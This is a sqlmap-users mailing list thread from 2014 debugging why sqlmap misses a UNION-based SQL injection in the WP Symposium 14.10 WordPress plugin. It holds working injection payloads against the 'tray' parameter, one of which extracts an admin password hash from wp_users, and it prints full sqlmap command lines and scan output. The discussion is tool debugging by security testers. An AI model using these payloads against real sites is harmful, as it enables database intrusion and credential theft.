Re: [sqlmap-users] WP Symposium 14.10 UNION-able, but sqlmap doesn't detect it
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] WP Symposium 14.10 UNION-able, but sqlmap doesn't detect it
|
From: Miroslav S. <mir...@gm...> - 2014-12-15 20:39:33
|
Looking into traffic file I don't see "obvious" trails of SQLi. If you are
satisfied with your findings I won't look any further.
Bye
On Mon, Dec 15, 2014 at 6:55 PM, Brandon Perry <bpe...@gm...>
wrote:
>
> Aha, I got it:
>
> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req -o --dbms=mysql
> -p tray --flush-session -t /tmp/traffic.txt --proxy=http://127.0.0.1:8080
> --technique=u --suffix=" LIMIT 1,1#" --prefix='in_deleted ' --level=5
> --risk=3 -o _
> ___ ___| |_____ ___ ___ {1.0-dev-180ede0}
> |_ -| . | | | .'| . |
> |___|_ |_|_|_|_|__,| _|
> |_| |_| http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 09:54:50
>
> [09:54:50] [INFO] parsing HTTP request from '/tmp/req.req'
> [09:54:50] [INFO] setting file for logging HTTP traffic
> [09:54:50] [WARNING] persistent HTTP(s) connections, Keep-Alive, has been
> disabled because of its incompatibility with HTTP(s) proxy
> [09:54:50] [INFO] testing connection to the target URL
> [09:54:50] [INFO] heuristics detected web page charset 'ascii'
> [09:54:50] [WARNING] heuristic (basic) test shows that POST parameter
> 'tray' might not be injectable
> [09:54:50] [INFO] testing for SQL injection on POST parameter 'tray'
> [09:54:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
> [09:54:51] [WARNING] reflective value(s) found and filtering out
> [09:54:51] [INFO] testing 'MySQL UNION query (random number) - 1 to 10
> columns'
> [09:54:51] [INFO] target URL appears to be UNION injectable with 1 columns
> [09:54:51] [INFO] POST parameter 'tray' is 'MySQL UNION query (random
> number) - 1 to 10 columns' injectable
> POST parameter 'tray' is vulnerable. Do you want to keep testing the
> others (if any)? [y/N] n
> sqlmap identified the following injection points with a total of 26
> HTTP(s) requests:
> ---
> Parameter: tray (POST)
> Type: UNION query
> Title: MySQL UNION query (random number) - 1 column
> Payload: action=getMailMessage&tray=in_deleted UNION ALL SELECT
> CONCAT(0x71786b7171,0x756a6c48694a6a504545,0x71767a6a71) LIMIT 1,1#&mid=1
> ---
> [09:55:02] [INFO] testing MySQL
> [09:55:02] [INFO] confirming MySQL
> [09:55:03] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Ubuntu
> web application technology: Apache 2.4.7, PHP 5.5.9
> back-end DBMS: MySQL >= 5.0.0
> [09:55:03] [INFO] fetched data logged to text files under
> '/home/bperry/.sqlmap/output/172.31.16.26'
>
> [*] shutting down at 09:55:03
>
> bperry@ubuntu:~/tools/sqlmap$
>
>
> On Mon, Dec 15, 2014 at 11:46 AM, Brandon Perry <bpe...@gm...
> > wrote:
>>
>> Sorry, one more thing to note, the following command gets very close to
>> exploiting the injection:
>>
>> ./sqlmap.py -r /tmp/req.req -o --dbms=mysql -p tray --flush-session -t
>> /tmp/traffic.txt --proxy=http://127.0.0.1:8080 --technique=u --suffix="
>> LIMIT 1,1#" --union-char=f --prefix='in_deleted '
>>
>> The only problem is that the union-char is 'f', when I was hoping it
>> would be 0x66. When I capture the request and replace 'f' with 0x66, the
>> injection works. Looks like ' is a bad char.
>>
>> On Mon, Dec 15, 2014 at 11:29 AM, Brandon Perry <
>> bpe...@gm...> wrote:
>>>
>>> Playing with the queries sqlmap sends a bit more:
>>>
>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT NULL#&mid=1
>>>
>>> This results in a 0 being returned where the password hash was in the
>>> successful injection:
>>>
>>> 1[split]0[split]in_deleted UNION ALL SELECT NULL#[split]
>>> ^ injection result
>>>
>>>
>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361#&mid=1
>>>
>>> This payload also results in a 0 being returned, not 'fdsa' as you would
>>> expect.
>>>
>>> However, this payload does return 'fdsa'
>>>
>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361 LIMIT
>>> 1,1#&mid=1
>>>
>>> 1[split]fdsa[split]in_deleted UNION ALL SELECT 0x66647361 LIMIT
>>> 1,1#[split]
>>>
>>>
>>> Hope this helps.
>>>
>>>
>>> On Mon, Dec 15, 2014 at 11:01 AM, Brandon Perry <
>>> bpe...@gm...> wrote:
>>>>
>>>> Here is the console output. Attached is the traffic log in a zip:
>>>>
>>>> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5
>>>> --risk=3 -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt
>>>> _
>>>> ___ ___| |_____ ___ ___ {1.0-dev-180ede0}
>>>> |_ -| . | | | .'| . |
>>>> |___|_ |_|_|_|_|__,| _|
>>>> |_| |_| http://sqlmap.org
>>>>
>>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>>> prior mutual consent is illegal. It is the end user's responsibility to
>>>> obey all applicable local, state and federal laws. Developers assume no
>>>> liability and are not responsible for any misuse or damage caused by this
>>>> program
>>>>
>>>> [*] starting at 08:56:27
>>>>
>>>> [08:56:27] [INFO] parsing HTTP request from '/tmp/req.req'
>>>> [08:56:27] [INFO] setting file for logging HTTP traffic
>>>> [08:56:27] [INFO] flushing session file
>>>> [08:56:27] [INFO] testing connection to the target URL
>>>> [08:56:27] [INFO] heuristics detected web page charset 'ascii'
>>>> [08:56:27] [INFO] testing if the target URL is stable. This can take a
>>>> couple of seconds
>>>> [08:56:28] [INFO] target URL is stable
>>>> [08:56:28] [WARNING] heuristic (basic) test shows that POST parameter
>>>> 'tray' might not be injectable
>>>> [08:56:28] [INFO] testing for SQL injection on POST parameter 'tray'
>>>> [08:56:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>>>> clause'
>>>> [08:56:28] [WARNING] reflective value(s) found and filtering out
>>>> [08:56:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>>>> clause (MySQL comment)'
>>>> [08:56:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>>>> clause (Generic comment)'
>>>> [08:56:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>>>> clause'
>>>> [08:57:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>>>> clause (MySQL comment)'
>>>> [08:57:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>>>> clause (Generic comment)'
>>>> [08:57:18] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING,
>>>> ORDER BY or GROUP BY clause (RLIKE)'
>>>> [08:57:28] [INFO] testing 'Generic boolean-based blind - Parameter
>>>> replace (original value)'
>>>> [08:57:28] [INFO] testing 'MySQL boolean-based blind - Parameter
>>>> replace (MAKE_SET - original value)'
>>>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter
>>>> replace (ELT - original value)'
>>>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter
>>>> replace (bool*int - original value)'
>>>> [08:57:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter
>>>> replace (original value)'
>>>> [08:57:29] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter
>>>> replace (original value)'
>>>> [08:57:29] [INFO] testing 'Generic boolean-based blind - GROUP BY and
>>>> ORDER BY clauses'
>>>> [08:57:30] [INFO] testing 'Generic boolean-based blind - GROUP BY and
>>>> ORDER BY clauses (original value)'
>>>> [08:57:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY
>>>> and ORDER BY clauses'
>>>> [08:57:31] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY
>>>> and ORDER BY clauses'
>>>> [08:57:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or
>>>> HAVING clause'
>>>> [08:57:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or
>>>> HAVING clause (EXTRACTVALUE)'
>>>> [08:57:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or
>>>> HAVING clause (UPDATEXML)'
>>>> [08:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or
>>>> HAVING clause (BIGINT UNSIGNED)'
>>>> [08:57:45] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or
>>>> HAVING clause'
>>>> [08:57:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or
>>>> HAVING clause'
>>>> [08:57:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or
>>>> HAVING clause (EXTRACTVALUE)'
>>>> [08:57:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or
>>>> HAVING clause (UPDATEXML)'
>>>> [08:57:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or
>>>> HAVING clause (BIGINT UNSIGNED)'
>>>> [08:58:01] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or
>>>> HAVING clause'
>>>> [08:58:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING
>>>> clause'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace
>>>> (EXTRACTVALUE)'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace
>>>> (UPDATEXML)'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace
>>>> (BIGINT UNSIGNED)'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and
>>>> ORDER BY clauses'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and
>>>> ORDER BY clauses (EXTRACTVALUE)'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and
>>>> ORDER BY clauses (UPDATEXML)'
>>>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - GROUP BY and
>>>> ORDER BY clauses (BIGINT UNSIGNED)'
>>>> [08:58:08] [INFO] testing 'MySQL inline queries'
>>>> [08:58:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>>>> [08:58:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
>>>> [08:58:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>>>> [08:58:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind
>>>> (comment)'
>>>> [08:58:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy
>>>> query)'
>>>> [08:58:26] [INFO] POST parameter 'tray' seems to be 'MySQL < 5.0.12 AND
>>>> time-based blind (heavy query)' injectable
>>>> [08:58:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
>>>> [08:58:26] [INFO] automatically extending ranges for UNION query
>>>> injection technique tests as there is at least one other (potential)
>>>> technique found
>>>> [08:58:28] [INFO] target URL appears to be UNION injectable with 1
>>>> columns
>>>> [08:58:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 20
>>>> columns'
>>>> [08:58:29] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
>>>> [08:58:31] [INFO] testing 'MySQL UNION query (random number) - 22 to 40
>>>> columns'
>>>> [08:58:32] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
>>>> [08:58:33] [INFO] testing 'MySQL UNION query (random number) - 42 to 60
>>>> columns'
>>>> [08:58:35] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
>>>> [08:58:36] [INFO] testing 'MySQL UNION query (random number) - 62 to 80
>>>> columns'
>>>> [08:58:38] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
>>>> [08:58:39] [INFO] testing 'MySQL UNION query (random number) - 82 to
>>>> 100 columns'
>>>> [08:58:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
>>>> [08:58:42] [INFO] testing 'Generic UNION query (random number) - 1 to
>>>> 20 columns'
>>>> [08:58:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40
>>>> columns'
>>>> [08:58:45] [INFO] testing 'Generic UNION query (random number) - 22 to
>>>> 40 columns'
>>>> [08:58:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60
>>>> columns'
>>>> [08:58:48] [INFO] testing 'Generic UNION query (random number) - 42 to
>>>> 60 columns'
>>>> [08:58:49] [INFO] testing 'Generic UNION query (NULL) - 62 to 80
>>>> columns'
>>>> [08:58:50] [INFO] testing 'Generic UNION query (random number) - 62 to
>>>> 80 columns'
>>>> [08:58:52] [INFO] testing 'Generic UNION query (NULL) - 82 to 100
>>>> columns'
>>>> [08:58:53] [INFO] testing 'Generic UNION query (random number) - 82 to
>>>> 100 columns'
>>>> [08:58:54] [INFO] checking if the injection point on POST parameter
>>>> 'tray' is a false positive
>>>> POST parameter 'tray' is vulnerable. Do you want to keep testing the
>>>> others (if any)? [y/N] n
>>>> sqlmap identified the following injection points with a total of 2049
>>>> HTTP(s) requests:
>>>> ---
>>>> Parameter: tray (POST)
>>>> Type: AND/OR time-based blind
>>>> Title: MySQL < 5.0.12 AND time-based blind (heavy query)
>>>> Payload: action=getMailMessage&tray=in_deleted AND
>>>> 9095=BENCHMARK(5000000,MD5(0x6e434246))-- QPnA&mid=1
>>>> ---
>>>> [08:59:48] [INFO] testing MySQL
>>>> [08:59:48] [WARNING] it is very important not to stress the network
>>>> adapter during usage of time-based payloads to prevent potential errors
>>>> do you want sqlmap to try to optimize value(s) for DBMS delay responses
>>>> (option '--time-sec')? [Y/n]
>>>> [08:59:51] [INFO] confirming MySQL
>>>> [08:59:53] [INFO] adjusting time delay to 1 second due to good response
>>>> times
>>>> [08:59:53] [INFO] the back-end DBMS is MySQL
>>>> web server operating system: Linux Ubuntu
>>>> web application technology: Apache 2.4.7, PHP 5.5.9
>>>> back-end DBMS: MySQL >= 5.0.0
>>>> [08:59:53] [INFO] fetched data logged to text files under
>>>> '/home/bperry/.sqlmap/output/172.31.16.26'
>>>>
>>>> [*] shutting down at 08:59:53
>>>>
>>>> bperry@ubuntu:~/tools/sqlmap$
>>>>
>>>> On Mon, Dec 15, 2014 at 10:54 AM, Miroslav Stampar <
>>>> mir...@gm...> wrote:
>>>>>
>>>>> Hi.
>>>>>
>>>>> I don't see a reason why this form of UNION test would be any
>>>>> different than the regular used by sqlmap. Can you please send me the
>>>>> traffic file for such run (... --flush-session -t traffic.txt) along with
>>>>> console output?
>>>>>
>>>>> Bye
>>>>> On Dec 15, 2014 5:50 PM, "Brandon Perry" <bpe...@gm...>
>>>>> wrote:
>>>>>
>>>>>> Hello!
>>>>>>
>>>>>> Playing around with the following vulnerabivlity:
>>>>>>
>>>>>> http://www.exploit-db.com/exploits/35505/
>>>>>>
>>>>>>
>>>>>> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1
>>>>>> UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1'
>>>>>> does result in a response from the server with the hash of the first user:
>>>>>>
>>>>>> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION
>>>>>> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>>>>>>
>>>>>>
>>>>>> However, sqlmap only finds a time based injection. Looking at sqlmap
>>>>>> through burp, I do see sqlmap doesn't try an injection syntax like the one
>>>>>> used in the PoC. It may be useful to add a syntax of UNION (SELECT
>>>>>> CONCAT(blah, blah, blah) FROM blah).
>>>>>>
>>>>>> Just a thought!
>>>>>>
>>>>>>
>>>>>> --
>>>>>> http://volatile-minds.blogspot.com -- blog
>>>>>> http://www.volatileminds.net -- website
>>>>>>
>>>>>>
>>>>>> ------------------------------------------------------------------------------
>>>>>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>>>>>> from Actuate! Instantly Supercharge Your Business Reports and
>>>>>> Dashboards
>>>>>> with Interactivity, Sharing, Native Excel Exports, App Integration &
>>>>>> more
>>>>>> Get technology previously reserved for billion-dollar corporations,
>>>>>> FREE
>>>>>>
>>>>>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>>>>>> _______________________________________________
>>>>>> sqlmap-users mailing list
>>>>>> sql...@li...
>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>
>>>>>>
>>>>
>>>> --
>>>> http://volatile-minds.blogspot.com -- blog
>>>> http://www.volatileminds.net -- website
>>>>
>>>
>>>
>>> --
>>> http://volatile-minds.blogspot.com -- blog
>>> http://www.volatileminds.net -- website
>>>
>>
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>>
>
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>
--
Miroslav Stampar
http://about.me/stamparm
|
